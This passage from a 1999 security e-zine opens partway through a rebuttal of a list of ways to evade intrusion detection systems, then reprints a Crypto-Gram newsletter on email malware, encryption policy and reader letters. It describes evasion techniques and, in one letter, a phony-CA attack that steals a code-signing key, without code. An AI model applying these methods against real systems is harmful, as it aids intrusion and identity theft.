A network based IDS is vulnerable to this. However host based systems aren't. Some network based IDS
systems such as NFR and Dragon can even be configured to detect long term low bandwidth network
sessions.
31 - Change routes to target to avoid the IDS.
This is a valid attack if knowledge of the topology is known before hand. Many times in order to
accomplish this, a certain amount of network discovery is required. This mapping can be easily picked up
by most network based IDS products. It also requires perfect knowledge of where passive IDS systems are
deployed.
32 - Change return routes from target to avoid the IDS.
See 31.
33 - Use source routing to reroute each packet through a different path to the victim, thus avoiding any
single IDS.
Almost every firewall, router and server drops and logs source routed packets. 31,32 and 33 also assume
that there are alternate network paths to target servers when in fact most network IDS systems are
deployed as choke points.
34 - Start an outbound session from the victim via a modem and attack over that connection. If the IDS is
network-based, it will miss these packets.
Absolutely. We can add even more methods to defeat intrusion detection systems by identifying them and
then launching attacks that they do not detect. For example, we may be able to deliver a virus to a
Windows NT system protected by Axent IA, BlackICE or even RealSecure. None of those systems detect
system level viruses.
35 - Interfere with the infrastructure between the victim and the IDS. In remote monitoring and network-
based IDS systems, this is often possible by modifying router traffic (as a simple example).
This is a lot like 33. Network based IDS products 'sniff' network traffic. If the traffic isn't there to 'sniff' then
there is no intrusion detection. This attack is only valid if the attacker can modify internal network routing
and there are other access points for the traffic to flow. Many network IDS products also detect when there
are attempts to re-route traffic.
36 - Break into an intermediary to break the trace back of the attack. The intrusion may be detected, but
they won't be able to trace it to you (unless they are very good at traces).
The original article was entitled "50 Ways to Defeat Your Intrusion Detection System". This method does
not defeat detection, only the chance that the ultimate target will figure out exactly who is doing the
attacking. One could also argue that the intermediary target is just as likely to detect an attack as the
ultimate target.
37 - Start a session on an unusual IP port. These ports are often not understood or watched by IDS systems.
This assumes that an attacker already has access to a system on the target network. Brand new attacks
don't start this way. There are a wide variety of programs such as NetCat which can be used to open up
ports in unusual places. Many of these programs are detected by network IDS products. Some of them, such
as RealSecure, even detect LOKI ICMP sessions.
38 - Use a modified protocol for communications, such as one that reverses bytes on words. (See PDP-11
and VAX encoding for examples).
This simply "encrypts" a network communication. It assumes that there is a cooperating system on the
target network.
39 - Use IPX over IP for the attack. The IDS will probably only notice the IP packets and not understand
the content.
And if the target network has an IPX based IDS it will pick up the attack accordingly.
40 - Use a different tunneled protocol session for the attack - such as IP over HTML.
This is another communication encryption technique.
------------------------------------------------------------------------
Bonus Attack - Define your own protocol for a new application and attack over it.
------------------------------------------------------------------------
See 40. If you have access to a system, write your own encrypted pipe and then communicate with it from
someplace else in front of an IDS, this is not defeating the IDS. None of these methods consider all of the
poking and prodding that it may take to find the right combination of IP protocol or TCP/UDP source port
to bypass a firewall.
41 - Attack over dial-ins instead of a network. Network-based IDS systems will never notice this activity.
Absolutely. See 34.
42 - Create large numbers of false positives to increase noise level. This will make finding the real attack
human time intensive and people tend to fail under these circumstances.
Interesting point, but consider that network management systems are designed to process and present
information that could not be understood by any human. IDS systems are the same way. For example with
Dragon (shameless product placement) there are a variety of different tools to look at different data at
many different levels of abstraction. Tools from companies such as WebTrends tend to present all sorts of
security information in a very easy to understand format. And I am of the opinion that the last thing an
attack may want to do is put a target on high alert.
43 - Plant the intrusion instructions within a Word macro and send a document to the victim. The IDS
probably can't decode the attack inside the macro.
See 34. Some products such as RealSecure do look for suspicious JAVA and ActiveX downloads. Proxy
firewalls that perform virus checking may also identify this attack.
44 - Plant the intrusion code within another macro and send to victim. Power point perhaps, or 123, or ...
you get the idea.
See 43 & 34. This is another example of how these 50 techniques are not 50 unique techniques.
45 - Put the attack in a compiled program (i.e., a Trojan Horse) and get the victim to download the attack
and run it for you.
This is a classic all time attack. Common Trojan Horses can be detected by many host based and network
based IDS products. Some firewalls now even recognize Back-Orifice scans. On the other hand, this is one
of the most serious problems in computer security today. It is almost impossible to examine binary
programs or even source code and predict exactly what the program will do. So, yeah, IDS products can't
do this, but it's not a compelling reason to throw away your IDS. Most IDS or firewall products can't
discover when you're about to send sensitive corporate information via email either.
46 - Use a rarely used protocol for the attack. Chances are the IDS doesn't know how to interpret the
packets.
Protocol is not a well defined term. If this is meant as a different UDP/TCP port then the network IDS
would need to understand what it is looking for. But this is how most network based IDS products work.
They only look for things they understand or can understand to be suspicious. If this attack represents other
IP protocols than ICMP, UDP and TCP, then most IDS products can be configured to alert on them.
47 - Recode the attack in a different language than it was originally published in.
I don't think this works. Consider the check-cgi program that has been floating around for a few months
now and checks for 70+ vulnerable CGI-BIN programs. It has been ported from C to Rebol without any
difference at the network layer. This attack only works if the IDS is searching for a specific binary
program. Most traditional IDS products don't do this.
48 - Use any non-technical attack (such as so-called human engineering). Since the IDS only looks at bits
and bytes, it doesn't detect many of the common attacks used by attackers today.
Yes, but building alarm systems, background checks, cameras, employee training programs and many other
systems are available to thwart these techniques. There are even legal techniques to prevent competitors
from hiring away key personel.
49 - Attack any system that doesn't run Unix. Since almost all of today's IDS systems only look for Unix
attacks, everything else will pass undetected. (Some apparently detect NT attacks now as well.)
A quick survey reveals that NetProwler, NFR Flight Jacket, NetRanger, RealSecure, Dragon and
BlackICE all detect a multitude of Windows NT attacks.
50-1000+ - Use one of the 1000 or so published attacks not detected by current systems. The largest
number of detected attacks I have seen advertised to date as being detected by any such system is only
about 50. (One vendor recently claimed over 150, but the newest numbers I heard for known vulnerabilities
has gone up to 2,000) Nevertheless, 150 is progress over 50!
Where are these published 1000 attacks? When checking sites like Packetstorm and Rootshell, most of the
major attacks are covered by IDS products. There is always an IDS gap where new attacks require new
signatures to be developed, but for the most part, published vulnerabilities tend to have IDS products that
detect them.
------------------------------------------------------------------------
Bonus attacks - 1000+ to infinity - Create a new attack script. IDS systems today almost all look only for a
small number of known attacks.
------------------------------------------------------------------------
See 50-1000+.
Conclusion
It is very hard to measure intrusion detection systems and network security because the topic is extremely
vague and subject to opinion. I hope that this paper will cause some debate and generate some discussion
about the role intrusion detection can play in our networks. It should be obvious to the reader that the
author truly feels that an IDS can be extremely useful part of a secure network. I do acknowledge that all
IDS products could be better and can't save the world, but they should not be discounted so easily.
@HWA
106.0 June 15th: Bruce Schneier's Cryptogram
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mailing-List: contact crypto-gram-help@chaparraltree.com; run by ezmlm
Precedence: bulk
Delivered-To: mailing list crypto-gram@chaparraltree.com
Delivered-To: moderator for crypto-gram@chaparraltree.com
Received: (qmail 11631 invoked from network); 16 Jun 1999 21:14:32 -0000
Message-Id: <4.1.19990616161311.009ebe60@chaparraltree.com>
X-Sender: schneier@counterpane.com (Unverified)
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Wed, 16 Jun 1999 16:14:40 -0500
To: crypto-gram@chaparraltree.com
From: Bruce Schneier
Subject: CRYPTO-GRAM, June 15, 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
CRYPTO-GRAM
June 15, 1999
by Bruce Schneier
President
Counterpane Systems
schneier@counterpane.com
http://www.counterpane.com
A free monthly newsletter providing summaries, analyses, insights, and
commentaries on cryptography and computer security.
Back issues are available at http://www.counterpane.com. To subscribe or
unsubscribe, see below.
Copyright (c) 1999 by Bruce Schneier
** *** ***** ******* *********** *************
In this issue:
E-Mail Viruses, Worms, and Trojan Horses
Counterpane Systems -- Featured Research
News
Counterpane Systems News
The Doghouse: Shopping.com
The Other Doghouse: ChecksNet
Hacking Archives on the WWW
International Encryption Policy
International Encryption Products
Comments from Readers
** *** ***** ******* *********** *************
E-Mail Viruses, Worms, and Trojan Horses
Looking back from the future, 1999 will have been a pivotal year for
malicious software: viruses, worms, and Trojan horses (collectively known
as "malware"). It's not more malware; we've already seen thousands. It's
not Internet malware; we've seen that before, too. But this is the first
year we've seen malware that uses e-mail to propagate over the Internet and
tunnel through firewalls. And it's a really big deal.
Viruses and worms survive by reproducing on new computers. Before the
Internet, computers communicated mostly through floppy disks. Hence, most
viruses propagated on floppy disks, and sometimes on computer bulletin
board systems (BBSs).
There are some obvious effects of floppies as a vector. First, malware
propagates slowly. One computer shares a disk with another which shares a
disk with five more, and over the course of weeks or months a virus turns
into an epidemic. Or maybe someone puts a virus-infected program on a
bulletin board, and thousands get infected in a week or two.
Second, it's easy to block disk-borne malware. Most anti-virus programs
can automatically scan all floppy disks. Malware is blocked at the gate.
BBSs can still be a problem, but many computer users are trained never to
download software from a BBS. Even so, anti-virus software can
automatically scan new files for malware.
And third, anti-viral software can easily deal with the problem. It's easy
to write software to block malware you know about. You simply have the
anti-virus scanner search for bit strings that signify the virus (called a
"signature") and then execute the automatic program to delete the virus and
restore normalcy. This deletion routine is unique per virus, but it is not
hard to develop. Anti-viral software has tens of thousands of signatures,
each tuned to a particular virus. Companies release them within a day of
learning of a new virus. And as long as viruses propagate slowly, this is
good enough. My software automatically updates itself once a month. Until
1999, that was enough.
What's new in 1999 is e-mail propagation of malware. These programs -- the
Melissa virus and its variants, the Worm.ExploreZip worm and its inevitable
variants, etc. -- arrive via e-mail and use e-mail features in modern
software to replicate themselves across the network. They mail themselves
to people known to the infected host, enticing the recipients to open or
run them. They don't propagate over weeks and months; they propagate in
seconds. Anti-viral software cannot possibly keep up.
And e-mail is everywhere. It runs over Internet connections that block
everything else. It tunnels through all firewalls. Everyone uses it.
It's easy to point fingers at Microsoft. Melissa uses features in
Microsoft Word (and variants use Excel) to automatically e-mail itself to
others, and Melissa and Worm.ExploreZip make use of the automatic mail
features of Microsoft Outlook. Microsoft is certainly to blame for
creating the powerful macro capabilities of Word and Excel, blurring the
distinction between executable files (which can be dangerous) and data
files (which, before now, were safe). They will be to blame when Outlook
2000, which supports HTML, makes it possible for users to be attacked by
HTML-based malware simply by opening an e-mail. Microsoft set the security
state-of-the-art back 25 years with DOS, and they have continued that
legacy to this day. They certainly have a lot to answer for, but the
meta-problem is more subtle.
One problem is the permissive nature of the Internet and the computers
attached to it. As long as a program has the ability to do anything on the
computer it is running on, malware will be incredibly dangerous. Just as
firewalls protect different computers on the same network, we're going to
need something similar to protect different processes running on the same
computer.
This cannot be stopped at the firewall. This type of malware tunnels
through a firewall using e-mail, and then pops up on the inside and does
damage. So far the examples have been mild, but they represent a proof of
concept. And the effectiveness of firewalls will diminish as we open up
more services (e-mail, Web, etc.), as we add increasingly complex
applications on the internal net, and as crackers catch on. This
"tunnel-inside-and-play" technique will only get worse.
And anti-virus software can't help much. If a virus can infect 1.2 million
computers (one estimate of Melissa infections) in the hours before a fix is
released, that's a lot of damage. What if the code took pains to hide
itself, so that a virus won't be discovered for a couple of days? What if
a worm just targeted an individual; it would delete itself off any computer
whose userID didn't match a certain reference? How long would it take
before that one is discovered? What if it e-mailed a copy of the user's
login script (most contain passwords) to an anonymous e-mail box before
self-erasing? What if it automatically encrypted outgoing copies of itself
with PGP or S/MIME? Or signed itself; signing keys are often left lying
around the system. Even a few minutes of thinking about this yields some
pretty scary possibilities.
It's impossible to push the problem off onto users with "do you trust this
message/macro/application" messages. Sure, it's unwise to run executables
from strangers, but both Melissa and Worm.ExploreZip arrive pretending to
be friends and associates of the recipient. Worm.ExploreZip even replied
to real subject lines. Users can't make good security decisions under
ideal conditions; they don't stand a chance against a virus capable of
social engineering.
What we're seeing here is the convergence of several problems: the
permissiveness of networks, interconnections between applications on modern
operating systems, e-mail as a vector to tunnel through network defenses
and as a means to spread extremely rapidly, and the traditional naivete of
users. Simple patches won't fix this. There are some interesting
technologies on the horizon that try to mimic the body's own immune system
to automatically deal with unknown malware, but I am not very optimistic
about them. Sure they'll catch some things, but it will always be possible
to design malware specifically to defeat the immune systems. A large
distributed system that communicates at the speed of light is going to have
to accept the reality of viral infections at the speed of light. Unless
security is designed into the system from the bottom up, we're constantly
going to be fighting a holding action.
Melissa:
http://www.zdnet.com/zdnn/stories/news/0,4586,2233116,00.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2234121,00.html
Worm.ExploreZip
http://www.zdnet.com/zdnn/stories/news/0,4586,2274306,00.html
http://www.wired.com/news/news/politics/story/20160.html
http://www.symantec.com/press/1999/n990614d.html
** *** ***** ******* *********** *************
Counterpane Systems -- Featured Research
"Protecting Secret Keys with Personal Entropy"
C. Ellison, C. Hall, R. Milbert, and B. Schneier, FUTURE GENERATION
COMPUTER SYSTEMS, to appear.
Conventional encryption technology often requires users to protect a secret
key by selecting a password or passphrase. While a good passphrase will
only be known to the user, it also has the flaw that it must be remembered
exactly in order to recover the secret key. As time passes, the ability to
remember the passphrase fades and the user may eventually lose access to
the secret key. We propose a scheme whereby a user can protect a secret key
using the "personal entropy" in his own life, by encrypting the passphrase
using the answers to several personal questions. We designed the scheme so
the user can forget answers to a subset of the questions and still recover
the secret key, while an attacker must learn the answer to a large subset
of the questions in order to recover the secret key.
http://www.counterpane.com/personal-entropy.html
** *** ***** ******* *********** *************
News
Hushmail is like Hotmail, but encrypted. They implement SSL from the
browser to the server, and Blowfish to encrypt messages. Free secure
e-mail for the masses. Their source code is available via free download.
Furthermore, they developed their product off-shore, so they don't face any
export restrictions. I haven't seen any evaluations of the code, but it's
certainly a good idea.
News story:
http://www.wired.com/news/news/email/explode-infobeat/technology/story/19804
.html
Hushmail homepage:
http://www.hushmail.com
Technical summary: https://www.hushmail.com/tech_description.htm
Source code: http://www.cypherpunks.ai/~hush/hush-src.103.zip
And ZipLip is a competing secure web e-mail service:
http://www.techweb.com/wire/story/TWB19990526S0002
I'll write more about both of these products next month.
The French data agency CNIL is investigating Microsoft and Intel, to
determine if their anti-privacy antics violates any European data
protection laws.
http://www.europa.eu.int/comm/dg15/en/media/dataprot/wpdocs/wp16en.htm
http://www.europa.eu.int/comm/dg15/en/media/dataprot/wpdocs/wp17en.htm
A report on how 128-bit crypto was liberated in France.
http://jya.com/jospin-coup.htm
The United States has been accused using key-escrow to steal secrets.
http://www.techweb.com/wire/story/TWB19990518S0004
http://www.nytimes.com/techweb/TW_Report_U_S_Uses_Key_Escrow_To_Steal_Secret
s.html
How to discuss Blowfish with your children.
http://www.hcs.harvard.edu/~demon/issues/apr_26_1999/blowfish/blowfish.html
There are rumors that the CIA is using computers to attack the foreign bank
accounts of Yugoslav leader Milosevic.
http://www.techweb.com/wire/story/reuters/REU19990524S0001
"We've lately had reason to wonder if our nation's cryptography policy is
being made by fools. It is a mixed blessing to learn that the people in
charge are merely liars." A good editorial.
http://www.zdnet.com/pcweek/stories/columns/0,4351,403283,00.html
OpenSSL, an open-source toolkit for SSL and TLS, version 0.9.3 has been
released.
http://www.openssl.org/
Here's a site that provides random primitive and irreducible polynomials,
useful for stream-cipher construction.
http://www.dmi.ens.fr/~chabaud/Poly/polyform.html
U.S. banks are opening a lab to test computer security products.
http://www.news.com/News/Item/0,4,36923,00.html
The Electronic Telegraph has an interesting feature on the security of
safes: how they're made, how they can be attacked. I never realized that
safes were rated according to how much insurance you can get on cash contents.
http://www.telegraph.co.uk:80/et?ac=000647321007942&rtmo=Q9QwSezR&atmo=99999
999&pg=/et/99/5/13/ecfsafe13.html
Good news department: The U.K. has reversed its position on key escrow.
Blair's government has dropped a proposal that would have required it.
http://www.infoworld.com/cgi-bin/displayStory.pl?990527.icblair.htm
Someone wrote an Enigma-machine simulator that runs on an iButton. So you
can have an Enigma-machine secret decoder ring.
http://www.javaworld.com/jw-08-1998/jw-08-indepth.html
The National Security Study Group (some government agency or another)
launched a web site (http://www.nssg.gov) to encourage and gather public
comment on national security in the 21st century. Be nice and don't hack
them for a week or so.
http://www.fcw.com/pubs/fcw/1999/0531/fcw-agsitesurv-05-31-99.html
Send secret messages in DNA.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_365000/365183.stm
http://news.excite.com/news/r/990610/02/science-dna-microdot
http://www.cnn.com/NATURE/9906/10/top.secret.dna.ap/
CGHQ, the British NSA-equivalent, is moving. Their new site will house
4500 people, and should be completed by 2002.
http://www.guardianunlimited.co.uk/Archive/Article/0,4273,3862710,00.html
Germany goes on record as being in favor of strong cryptography. It seems
they don't trust the U.S. not to spy on them.
http://www.wired.com/news/news/politics/story/20023.html
** *** ***** ******* *********** *************
Counterpane Systems News
The Black Hat Briefings '99 is a Computer Security Conference scheduled for
July 7 and 8 in Las Vegas, Nevada. DefCon is a hackers convention held the
weekend after. Bruce Schneier will be speaking at both.
http://www.blackhat.com/
http://www.defcon.org/
** *** ***** ******* *********** *************
The Doghouse: Shopping.com
For security-clueless shopping, you can't beat this one: "Shopping.com
uses RSA Laboratories commercial encryption suited for U.S. export
(RC4-Export, 128 bit with 40 secret). What does that mean to you? RSA
protects your sensitive communications over the Internet (such as a credit
card number) by transforming the data into an unreadable format.
Furthermore, Shopping.com ensures the privacy of the information not only
online, but through our back-end systems." Wow. I am in awe.
http://www.shopping.com/store/INFO/INFO_SECURE.ASP?nav=|-1|-1|-1|-1|-1&x=cgi
-bin
** *** ***** ******* *********** *************
The Other Doghouse: ChecksNet
You too can send your bank account name and routing information in the
clear over the net. Order your checks from these people. Their Web page
clearly states: "ChecksNet protects your personal and bank account
information from theft or misuse by encoding and scrambling the data as it
is transmitted from this website to us." However, the order form is sent
in the clear; they don't use SSL.
http://www.checksnet.com/order.htm
** *** ***** ******* *********** *************
Hacking Archives on the WWW
There's a lot of hacking information on the WWW, but you have to take the
time to look for it. Typing "hacker archive" into AltaVista results in
over three million hits. Yahoo's information is much better organized, but
there's still a lot of pages to wade through.
A great starting site is
http://www.infoworld.com/cgi-bin/displayNew.pl?/security/links/security_corn
er.htm. These guys write a weekly security column for InfoWorld, and their
site is a wealth of useful security links. When I'm looking for something,
I usually go there first.
The content site I spent the most time at was
http://www.genocide2600.com/~tattooman/main.shtml, because it seemed
well-organized. Nevertheless, it was clear that this is an archive, not a
directory. If you're trying to find a particular hack for a particular
piece of software on a particular operating system, expect to spend some
time searching. The material is sorted by general category, but the
descriptions are limited. On the other hand, if you're looking for
write-ups of the latest security holes and exploits, it's neatly sorted by
date.
For a non-hacker like me, most of this material is way beyond my level of
expertise. Still, there's also a fair amount of scary and useful stuff.
Just reading through the archive descriptions is enough to make anyone lose
faith in any kind of network security. In addition to the vulnerabilities
and exploits, there are Windows, Novell, and Unix security tools; password
crackers; miscellaneous hacking tools; general utilities; and -- just in
case you'd forgotten that hacking was a subculture -- humor archives.
There are also links to archives of hacker discussion lists.
Other archives include:
The Electronic Frontier Foundation "hacker" archive.
http://www.eff.org/pub/Net_culture/Hackers/
The archives for 2600 Magazine and for Phrack Magazine.
http://www.2600.com
http://www.phrack.com
And Netscape's hacker page, with links to major hacker sites on the Web.
http://excite.netscape.com/computing_and_internet/programming/hacking
This last one is the Web page I found most interesting, in the abstract.
Hacking has come of age, if Netscape lists the links openly, instead of
trying to pretend they don't exist. In general, hackers (at least in their
public face) are more interested in penetrating systems and exposing
vulnerabilities than in causing damage or stealing money. But most sites
are still have legal disclaimers about how the information is only for
educational purposes and is not intended to be used to commit the crimes
that could be attributed to the information provided. First amendment or
not, much of this is a gray area.
** *** ***** ******* *********** *************
International Encryption Policy
EPIC has released its "Cryptography & Liberty 1999: An International Survey
of Encryption Policy." This is an excellent survey on international
encryption policy (it runs about 130 pages), produced by the Electronic
Privacy Information Center (EPIC).
Here's the executive summary:
"Most countries in the world today have no controls on the use of
cryptography. In the vast majority of countries, cryptography may be
freely used, manufactured, and sold without restriction. This is true for
both leading industrial countries and for developing countries. There is a
movement towards international relaxation of regulations relating to
encryption products, coupled with a rejection of key escrow and recovery
policies. Many countries have recently adopted policies expressly
rejecting requirements for key escrow systems and a few countries, most
notably France, have dropped their escrow systems. There are a small
number of countries where strong domestic controls on the use of
cryptography exist. These are mostly countries where human rights command
little respect.
"Recent trends in international law and policy point toward continued
relaxation of controls on cryptography. The Organization for Economic
Cooperation and Development's Cryptography Policy Guidelines and the
Ministerial Declaration of the European Union, both released in 1997, argue
for the liberalization of controls on cryptography and the development of
market-based, user driven cryptography products and services. There is a
growing awareness worldwide of encryption and an increasing number of
countries have developed policies, driven by the OECD guidelines.
"Export controls remain the most powerful obstacle to the development and
free flow of encryption. The revised December 1998 Wassenaar Arrangement
may roll back some of the liberalization sought by the OECD, particularly
by restricting the key lengths of encryption products that can be exported
without approval licenses. However, several major countries have already
indicated that they do not plan to adopt new restrictions.
"The United States government continues to lead efforts for encryption
controls around the world. The U.S. government has exerted economic and
diplomatic pressure on other countries in an attempt to force them into
adopting restrictive policies. The U.S. position may be explained, in
part, by the dominant role that national intelligence and federal law
enforcement agencies hold in the development of encryption policy."
http://www2.epic.org/reports/crypto1999.html
** *** ***** ******* *********** *************
International Encryption Products
The ACP has commissioned a study on the availability of international
encryption products. It's called "Growing Development of Foreign
Encryption Products in the Face of U.S. Export Regulations."
Here are excerpts from the executive summary:
"Development of cryptographic products outside the United States is not
only continuing but is expanding to additional countries; with rapid growth
of the Internet, communications-related cryptography especially is
experiencing high growth, especially in electronic mail, virtual private
network, and IPsec products. This report surveys encryption products
developed outside the United States and provides some information on the
effect of the United States export control regime on American and foreign
manufacturers.
"We have identified 805 hardware and/or software products incorporating
cryptography manufactured in 35 countries outside the United States. The
most foreign cryptographic products are manufactured in the United Kingdom,
followed by Germany, Canada, Australia, Switzerland, Sweden, the
Netherlands, and Israel in that order. Other countries accounted for
slightly more than a quarter of the world's total of encryption products.
"The 805 foreign cryptographic products represent a 149-product increase
(22%) over the most recent previous survey in December 1997. A majority of
the new foreign cryptographic products are software rather than hardware.
Also, a majority of these new products are communications-oriented rather
than data storage oriented; they heavily tend towards secure electronic
mail, IP security (IPsec), and Virtual Private Network applications.
"We identified at least 167 foreign cryptographic products that use strong
encryption in the form of these algorithms: Triple DES, IDEA, Blowfish,
RC5, or CAST-128. Despite the increasing use of these stronger
alternatives to DES, there also continues to be a large number of foreign
products offering the use of DES, though we expect to see a decrease in
coming years.
"On average, the quality of foreign and U. S. products is comparable. There
are a number of very good foreign encryption products that are quite
competitive in strength, standards compliance, and functionality."
http://www.seas.gwu.edu/seas/institutes/cpi/library/docs/cpi-1999-02.pdf
** *** ***** ******* *********** *************
Comments from Readers
From: "John C. Kennedy"
Subject: Novell
Having worked with Novell's security group closely for the last three and a
half years on cryptographic and network security issues, I want to point
out a couple of things that aren't quite apparent about the remote console
password encryption hack that you report on in your latest newsletter.
(Disclaimer: This is in no way an official response from Novell, merely a
constructive comment by an informed party.)
The use of the remote console feature for managing NetWare servers is
something that Novell has advised against for quite some time to begin
with. Server console access is something that Novell strongly recommends
be protected by physical access restrictions:
http://developer.novell.com/research/appnotes/1997/november/06/04.htm
Novell's security experts have *always* considered the use of remote
console capabilities to be a fundamentally risky proposition to begin with.
Console access allows direct access to the NetWare trusted computing base.
However, when customers demand such a feature and are willing to take the
risk it is difficult for any company to say no.
If one assesses network security from a "weakest link in the chain"
perspective, it is the fact that access to console services is available
remotely *at all* that is probably a bigger risk than the weak password
encryption technique employed. Console access is not something that should
be granted based simply on single factor authentication, but in many "low
threat" environments this is an acceptable risk/convenience trade-off to make.
The password obfuscation technique may seem amateurish at first glance, but
it most likely has more to do with some exportability issue than lack of
expertise or knowledge within Novell's security group. The design
pre-dates my association with Novell by a couple of years, but I am
confident that it was not due to ignorance within the security staff.
Obfuscation techniques are not something anyone likes to bet the farm on,
and Novell's strong caveats about the use of rconsole reflects this.
Novell has been working for the last couple of years on an architecture to
permit strong encryption for authentication purposes without allowing that
same capability to be exploited as an uncontrolled method for
confidentiality. This is not an easy problem to tackle, but Novell's new
international cryptographic services architecture in fact solves this
"crypto with a hole" problem for both Novell and its customers.
(http://www.novell.com/corp/security/)
Regardless of one's position on the crypto export issue, we all know that
this has been a real problem for software and hardware vendors for quite
some time. It is especially difficult to solve for companies that ship to
so many different import/export jurisdictions. U.S. export laws are
matched by equally restrictive import laws in many countries. The ability
to field policy-controlled crypto will allow Novell to bring new network
security mechanisms to the global market based on cryptography that is
"strong" by anyone's measure.
I think your chastising of Novell is well-intentioned, but fails to
acknowledge that, (1) weak cryptography *is not* always the weakest link in
the security chain and (2), that import/export laws have had predictable
and, to date, largely unavoidable results in software designs destined for
global markets. So-called "strong cryptography" can lend a false sense of
security or be otherwise counterproductive when viewed in the larger
context that many vendors have to address. A context that, in fact, most
casual observers have neither the patience or necessary intimate knowledge
to address.
From: "Robert A. Lerche"
Subject: Microsoft's Internet Explorer
MS IE does not provide a means for encrypting downloaded personal
certificates. Netscape prompts for a password and encrypts local storage
(although I think you're allowed to specify a blank password), but MS IE
doesn't.
From: "Jack Hewlett"
Subject: Who's at risk?
You continually publish articles saying how bad various security software
products are. So the obvious question is, "Who's at risk here, the
Retailer or the Consumer?" I've never understood the need to be secretive
about my Credit Card Numbers. It seems to me, I could publish my Credit
Card number in the newspaper, and "I" would not be at any risk!
If a charge appears on my monthly statement and I can show the following:
1. The merchandise was NOT shipped to my address.
2. The Retailer does NOT have a piece of paper containing my signature.
3. The Retailer does NOT have a recording containing my voice.
then surely I'm under no legal obligation to pay that portion of the bill.
This is a very important topic for the individual. If all the risk
associated with weak security software falls on the Retailer, then I don't
have to care about this topic.
If my suppositions are incorrect, then how do I protect myself against all
the clerks who see my Credit Card Number when I use it in a retail
establishment? I understand that I have legal obligations to report a card
stolen when I no longer have physical possession of it. But, since it is
impossible for me to control knowledge of the Number (and Expiration Date),
can the "fine print" of the Credit Acceptance I signed hold me fiscally
responsible for something I can't control? Even if I did sign such terms,
would they hold up in court, when I argue that I did nothing wrong and
acted in a prudent manner?
From: Geoff Thorpe
Subject: Hacking root CAs in Internet Explorer
I note my mate Peter Gutmann's email about substituting root CAs into IE's
"certificate store". I think I actually alerted him to this, and the
problem remains in more recent versions. IE Version 4 also registers the
".der" file extension so that an ASN encoded self-signed X509 CA
certificate saved as cert.der and double-clicked will automatically launch
the "Accept new CA cert?" dialog of IE. By default, all the options are
enabled (ticked), including authenticating client and server certs (https),
authenticating email certs (S/MIME), and software signing (Authenticode).
Even the default button is "OK," so hitting enter is enough. They have,
however, added a new dialog box, so that selecting OK gives a quick "Are
you sure" type warning, displays all the information about the cert
(distinguished name components, expiry dates, etc.) and the default button
in this case is "No" (you have to click Yes to accept it). This still does
not address the fact that most users will not really grasp the gaping
security hole this creates for them -- though at least Netscape
Communicator goes some way towards letting them know you REALLY should
check up on the cert's authenticity before giving it too much trust -- and
they have a neat option to always provide warnings when using certs signed
by the new CA cert in question.
There's a very dangerous attack permitted by this lax attitude towards
accepting CA certs. If you can get anyone with an Authenticode signing key
(perhaps a developer has a signed cert from Verisign or whoever) to accept
a phony CA cert, then all hell can break loose. You can then get native
code in a signed .cab file (signed with a cert that is signed from the
phony CA) onto the developer's machine (it's now trusted, so they will not
be given warnings -- and depending on their settings, they may not even be
*told anything*). That native code can use MS's CryptoAPI to retrieve the
developer's Authenticode private key (in typical fashion, the API does not
require a password to retrieve the key) and mail it out to the hacker.
That hacker then has someone else's code-signing cert and key. Using it,
they can put signed viruses around, and provide signed hacked versions of
software (perhaps providing a "mirror" of popular software all of which is
really just dressed-up and highly creative "fdisk" variations) -- and if
law enforcement ever get involved, their only lead will be the unfortunate
developer's Authenticode cert. Of course, if the hacker can plant phony CA
certs around everywhere, he/she can always just create their own phony
CA-signed Authenticode certs (perhaps named "Microsoft Corp.") and use
those. But the point being illustrated here is that the hacker only needs
to get the phony CA into *one* developer's machine (not everybody they want
to hack); after that, he/she has someone else's digital identity with which
to wreak havoc.
But this brings me around to an issue I had been wanting to mention, and
relates to a background project of mine. Microsoft has its own cert-trust
settings, store, and API (if any at all); so does Netscape, so does any
S/MIME-enabled mailer, so does any secure tunneling utility, etc. etc. Not
only has this led to a complete decentralisation (it's pretty much
"per-application") on a user's system as to his/her "trust" settings, it
has also led to the inevitable incompatibilities of standards -- just ask
anyone working for a CA about processing cert-requests for IE (and each
version thereof), Navigator, and the popular web-servers. They're all
various mutations and modifications of ASN, X509, PEM, and MIME that give
massive headaches for anyone who wants to dream of cross-compatibility (as
of now, I don't know anyone who has managed to make a single user-cert
(with private key) work on Communicator and IE simultaneously).
My idea had been loosely termed the "PKI kernel" -- a core library and
interface that is presumed present and callable on all systems being
compiled and deployed. Unlike the proliferation of various PKI toolkits
using various standards (PKIX, etc.) and proprietary interfaces, I wanted
to just put the minimum necessary core in to allow some centralisation --
and to ensure it was thin enough that it did not impose functional
restrictions on applications using it. E.g., I was thinking that this
should not be a "provider plug-in" architecture, as its very benefit would
come from it being singular and ubiquitous on a system. It would not
provide any cryptographic tools (ciphers, PKC encryption, etc.), and it
would not provide any services (SSL tunneling, SSH, etc.) -- it would
simply be a way to centralise root certs, user certs, pending
cert-requests, and private keys, and maintain policies as to their use. At
its most rudimentary, it could just be a free-for-all cert repository. At
its more refined, it could be a strict framework where a root-user has
stipulated that policies are inherited from another system and that only
certain certs can be used for certain things. E.g., an app can ask the
core for a list of "user certs" for use with "https" or check if a
particular CA cert is trusted for a certain task, the policy could
stipulate that any signed (user) certs imported into the core for use with
S/MIME must be at least 1024 bits and signed by the "X" CA, etc.
It just seems that each operating system has one concept of "print
management", or "the TCP/IP stack", etc., and yet every single
crypto-enabled program seems to have its own concept of trusted root certs,
cert-policies, key-usages, and all the incompatibilities that come with
them. They all use the same "protocols" (SSL/TLS, S/MIME, etc.), and they
all use the same "algorithms" (RC4, RSA, etc.), because everyone sensibly
agrees that it's best to just get one standard right than many different
standards simultaneously, yet it's often overlooked that authenticity and
identification depend very much on the careful and coordinated handling of
certification, which every application seems to want to have its own
individual poke at.
** *** ***** ******* *********** *************
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
Please feel free to forward CRYPTO-GRAM to colleagues and friends who will
find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as
it is reprinted in its entirety.
